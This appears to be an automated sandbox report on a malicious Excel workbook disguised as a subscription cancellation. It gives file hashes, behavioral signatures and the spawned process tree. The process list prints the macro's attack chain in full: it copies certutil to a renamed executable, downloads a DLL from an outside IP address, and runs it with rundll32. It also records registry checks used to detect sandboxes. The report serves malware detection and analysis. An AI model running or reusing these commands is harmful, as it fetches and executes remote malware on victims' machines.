Analysis
-
max time kernel
149s -
max time network
141s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
10-06-2021 19:14
Behavioral task
behavioral1
Sample
cancel_sub_VCP1234567890123.xlsb
Resource
win7v20210408
Behavioral task
behavioral2
Sample
cancel_sub_VCP1234567890123.xlsb
Resource
win10v20210410
General
-
Target
cancel_sub_VCP1234567890123.xlsb
-
Size
123KB
-
MD5
9e1ee4a42c381eabcf2cde38a1aae7c9
-
SHA1
015bb306d9e54001d433b3ac2e7212b864f54ae2
-
SHA256
fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3
-
SHA512
d8955c76657c68542ebcd1fc0b14b69917976892a2005ff0fcace3754200d52c4557235e083b76f4115cc940281dbe77a8e390e8bd18fbe9d5cdb128191580ec
Malware Config
Signatures
-
Process spawned unexpected child process ⋅ 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4268 4440 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1864 4440 cmd.exe EXCEL.EXE -
Executes dropped EXE ⋅ 1 IoCs
Processes:
TTObk2.exepid process 692 TTObk2.exe -
Checks processor information in registry ⋅ 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry ⋅ 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener ⋅ 1 IoCs
Processes:
EXCEL.EXEpid process 4440 EXCEL.EXE -
Suspicious use of SetWindowsHookEx ⋅ 14 IoCs
Processes:
EXCEL.EXEpid process 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE -
Suspicious use of WriteProcessMemory ⋅ 8 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 4440 wrote to memory of 4268 4440 EXCEL.EXE cmd.exe PID 4440 wrote to memory of 4268 4440 EXCEL.EXE cmd.exe PID 4440 wrote to memory of 692 4440 EXCEL.EXE TTObk2.exe PID 4440 wrote to memory of 692 4440 EXCEL.EXE TTObk2.exe PID 4440 wrote to memory of 1864 4440 EXCEL.EXE cmd.exe PID 4440 wrote to memory of 1864 4440 EXCEL.EXE cmd.exe PID 1864 wrote to memory of 2128 1864 cmd.exe rundll32.exe PID 1864 wrote to memory of 2128 1864 cmd.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXEPID:4440"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"Checks processor information in registryEnumerates system info in registrySuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exePID:4268"C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exeProcess spawned unexpected child process
-
C:\programdata\TTObk2\TTObk2.exePID:692"C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dllExecutes dropped EXE
-
C:\Windows\System32\cmd.exePID:1864"C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartWProcess spawned unexpected child processSuspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exePID:2128rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Replay Monitor
Downloads
-
C:\ProgramData\TTObk2\TTObk2.dllMD5
336d5ebc5436534e61d16e63ddfca327
SHA13bc15c8aae3e4124dd409035f32ea2fd6835efc9
SHA2563973e022e93220f9212c18d0d0c543ae7c309e46640da93a4a0314de999f5112
SHA5127c0b0d99a6e4c33cda0f6f63547f878f4dd9f486dfe5d0446ce004b1c0ff28f191ff86f5d5933d3614cceee6fbbdc17e658881d3a164dfa5d6f4c699b2126e3d
-
C:\ProgramData\TTObk2\TTObk2.exeMD5
056c7d065f4622da9cc2848f47e2bae2
SHA16c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
-
C:\programdata\TTObk2\TTObk2.exeMD5
056c7d065f4622da9cc2848f47e2bae2
SHA16c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
-
memory/692-181-0x0000000000000000-mapping.dmp
-
memory/1864-183-0x0000000000000000-mapping.dmp
-
memory/2128-184-0x0000000000000000-mapping.dmp
-
memory/4268-179-0x0000000000000000-mapping.dmp
-
memory/4440-117-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-123-0x00007FF9D3020000-0x00007FF9D4F15000-memory.dmp
-
memory/4440-122-0x00007FF9D4F20000-0x00007FF9D600E000-memory.dmp
-
memory/4440-121-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-118-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-114-0x00007FF66AA70000-0x00007FF66E026000-memory.dmp
-
memory/4440-116-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-115-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp